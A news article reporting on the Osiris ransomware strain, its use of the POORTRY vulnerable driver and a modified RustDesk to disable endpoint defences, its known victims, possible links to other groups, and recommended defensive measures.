A new ransomware strain known as Osiris has surfaced, leveraging the POORTRY vulnerable driver in a bring-your-own-vulnerable-driver (BYOVD) technique to infiltrate and encrypt systems at a major Southeast Asian conglomerate late last year. Cybersecurity firm Security.com detailed the attack in a report published January 22, 2026, highlighting the use of a modified RustDesk remote access tool alongside the Poortry driver, drawing parallels to tactics employed by the Inc ransomware group.

The Osiris operation marks a sophisticated evolution in ransomware deployment, where attackers exploit legitimate but flawed drivers to bypass endpoint detection and response (EDR) protections. According to Security.com, the campaign targeted high-value entities, with initial access likely gained through phishing or exploited vulnerabilities, followed by lateral movement using living-off-the-land binaries.

Researchers noted the ransomware’s encryption routine employs AES-256 for file payloads and RSA-2048 for key exchange, appending .osiris extensions to victims’ data. A ransom note demands payment in Bitcoin, threatening data exfiltration and publication on a dark web leak site.

Poortry Driver: The BYOVD Enabler

The POORTRY driver, signed with a valid certificate, allows kernel-level privileges that disable security software, a hallmark of BYOVD attacks. Security.com’s analysis revealed attackers loaded the driver to terminate EDR processes, enabling unimpeded ransomware execution. This mirrors broader trends where threat actors repurpose vulnerable drivers from legitimate software vendors.

SiliconANGLE reported on January 22, 2026, that Osiris demonstrates ‘sophisticated tactics and experienced attackers,’ linking it to an assault on a food service franchisee. The group’s operational security, including custom tooling, suggests a well-resourced team possibly splintered from established ransomware-as-a-service (RaaS) operations.

Trend Micro’s prior research on similar BYOVD campaigns, such as Agenda ransomware’s cross-platform exploits detailed in an October 2025 report, underscores the growing reliance on driver abuse to evade defenses.

Attack Chain Unraveled

The intrusion began with a modified RustDesk executable, which Security.com identified as a dropper for the Poortry driver. Once loaded, the driver facilitated process injection and defense evasion, allowing Osiris to propagate across the network. Indicators of compromise include specific hashes for the RustDesk variant and Poortry.sys.

SiliconANGLE emphasized the attackers’ use of obfuscated PowerShell scripts for persistence, with C2 communication over encrypted channels. Victim data from the Southeast Asian conglomerate included sensitive financial records, prompting swift law enforcement notifications.

Posts on X from industry watchers like Wes DeVault on January 22 amplified the disclosure, noting Osiris’s potential ties to Locky family variants, though Security.com cautions against premature attribution without further forensic evidence.

Victim Profile and Impact

Osiris claimed American Vanguard as a victim in early January 2026, as tracked by Hookphish, a U.S. chemical manufacturer. The group’s leak site, ransomware.live, lists two confirmed victims, with exfiltrated data volumes exceeding 100GB in the conglomerate case per Security.com.

Financial repercussions remain undisclosed, but industry estimates peg average ransomware recovery costs at $4.5 million, per recent Sophos data. The attack disrupted operations for weeks, highlighting vulnerabilities in franchise supply chains.

RedPacket Security corroborated the American Vanguard breach on January 10, stressing no data was hosted or disclosed by trackers themselves.

Ties to Known Actors

Security.com points to tactical overlaps with Inc ransomware, including Poortry usage and RustDesk modifications, though code dissimilarities prevent definitive links. The Osiris binary’s string obfuscation and anti-analysis measures indicate developer maturity.

Historical context from Acronis’s 2017 analysis of an earlier Osiris variant tied it to Locky, but the new strain appears distinct, per The Hacker News coverage on January 22, 2026, which detailed the franchisee targeting.

Cisco Talos’s December 2025 report on DeadLock ransomware’s BYOVD loader exploiting Baidu drivers illustrates the technique’s proliferation across groups.

Defensive Strategies

Organizations should audit loaded drivers via tools like DriverQuery and block known vulnerable signatures through EDR policies. Security.com recommends behavioral monitoring for anomalous kernel callbacks associated with Poortry.

Microsoft’s driver blocklist updates and tools like AMSI for PowerShell scanning offer mitigation layers. Patching remote management tools like RustDesk and segmenting networks curb lateral movement.

Trend Micro advocates memory scanning for fileless payloads, as seen in Agenda attacks, to detect early BYOVD stages.

Broader Implications

The Osiris emergence signals intensified focus on Southeast Asia and U.S. manufacturing, per ransomware.live tracking. With RaaS affiliates experimenting with BYOVD, expect copycat campaigns.

Regulatory pressures, including SEC disclosure rules, will amplify scrutiny on breached firms. Security.com urges vendor accountability for driver signing to stem abuse.

Dark Web Informer’s January 21, 2026, update lists ongoing negotiations, underscoring the persistent ransomware economy.